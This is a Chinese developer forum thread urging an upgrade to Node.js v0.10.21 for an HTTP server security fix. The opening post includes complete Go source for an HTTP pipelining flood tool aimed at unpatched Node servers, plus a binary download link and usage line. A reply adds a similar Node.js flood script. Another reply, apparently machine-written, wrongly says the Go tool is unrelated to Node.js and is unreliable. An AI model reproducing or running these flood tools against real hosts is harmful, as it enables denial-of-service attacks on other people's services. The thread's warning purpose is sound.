提醒更新到Nodejs v0.10.21，以防exploiter

以下是官方说明：

This release contains a security fix for the http server implementation, please upgrade as soon as possible.

尽快更新吧，附上测试工具代码

package main
/*
A simple pipelining flood for nodejs
Author    pathletboy[at]gmail.com
Date    2013-10-18
*/
import (
“flag”
“log”
“net”
)
func main() {
host := flag.String(“host”, “”, “specify the target”)
flag.Parse()
if *host == “” {
flag.PrintDefaults()
return
}
var conn net.Conn
var err error
if conn, err = net.Dial(“tcp”, *host); err != nil {
log.Fatal(err)
}
for {
if _, err = conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + *host + “\r\nAccept: /\r\n\r\n”)); err != nil {
log.Fatal(err)
}
}
}

编译好的bin(win/linux)

http://pb.itsong.com/floodnode.7z

floodnode -host=“xxx.com:xx”

zlyuanteng 1楼作者

提醒更新到Node.js v0.10.21，以防exploiter

官方说明：

以下是官方说明：

This release contains a security fix for the http server implementation, please upgrade as soon as possible.

尽快更新到 Node.js v0.10.21 版本，以防止潜在的安全漏洞被利用。

更新建议

Node.js v0.10.21 包含了一个针对 HTTP 服务器实现的安全修复。由于该版本修复了潜在的漏洞，强烈建议所有使用 Node.js 的开发者尽快更新至此版本。

测试工具代码

为了帮助你理解为何需要更新，下面提供一个简单的测试工具代码。请注意，这个代码仅用于测试目的，不应该在生产环境中使用。

const net = require('net');

// 指定目标主机
const host = process.argv[2] || 'example.com';

if (!host) {
    console.log('Usage: node test-tool.js <target-host>');
    process.exit(1);
}

const client = new net.Socket();

client.connect(80, host, () => {
    console.log(`Connected to ${host}`);
});

client.on('data', (data) => {
    console.log(data.toString());
    client.destroy(); // 关闭连接
});

// 发送多个请求，模拟洪水攻击
for (let i = 0; i < 100; i++) {
    client.write('GET / HTTP/1.1\r\nHost: ' + host + '\r\nAccept: */*\r\n\r\n');
}

client.on('close', () => {
    console.log('Connection closed');
});

如何运行测试工具

保存上述代码为 test-tool.js，然后在命令行中运行：

node test-tool.js example.com

总结

通过上述测试工具，你可以看到如果未进行安全更新，HTTP 服务器可能会受到洪水攻击的影响。因此，强烈建议所有用户尽快更新到 Node.js v0.10.21 版本，以确保系统的安全性。

希望以上信息对你有所帮助！

yibo5220 2楼

＝＝ golang 楼主黑得漂亮（开玩笑哈~）

sinazl 3楼

不熟悉, 求讲解~

eggper 4楼

有一个非常简单的node攻击代码, 等过几天再发吧. cnode刚才也被攻击了.

vueper 5楼

讲解一下?

wuwangju 6楼

已更新

感谢通知。

ionicwang 7楼

根据你提供的信息，这个帖子提到了一个关于 Node.js 安全更新的问题。Node.js v0.10.21 版本修复了一个针对 HTTP 服务器实现的安全漏洞。因此，建议用户尽快更新到该版本，以防止潜在的攻击。

以下是一个简短的示例代码，展示如何更新 Node.js 到最新版本（包括 v0.10.21）：

# 更新 Node.js
sudo npm install -g n
sudo n 0.10.21

# 验证版本
node -v

解释：

sudo npm install -g n:
- 这条命令安装了 n 模块，这是一个用于管理不同 Node.js 版本的工具。
sudo n 0.10.21:
- 使用 n 工具来安装特定版本的 Node.js（这里是 v0.10.21）。
node -v:
- 通过这条命令可以验证当前安装的 Node.js 版本是否为 v0.10.21。

请注意，这个简单的脚本可以帮助你在 Linux 或 macOS 上进行 Node.js 的版本升级。如果你使用的是 Windows 系统，建议访问 Node.js 的官方网站下载对应版本的安装程序。

此外，关于提供的测试工具代码，由于这是一段 Go 语言的代码，而不是 Node.js 代码，所以它并不适用于 Node.js 环境。这段代码是一个简单的管道洪水攻击工具，旨在对目标服务器进行压力测试或攻击，而不是与 Node.js 直接相关。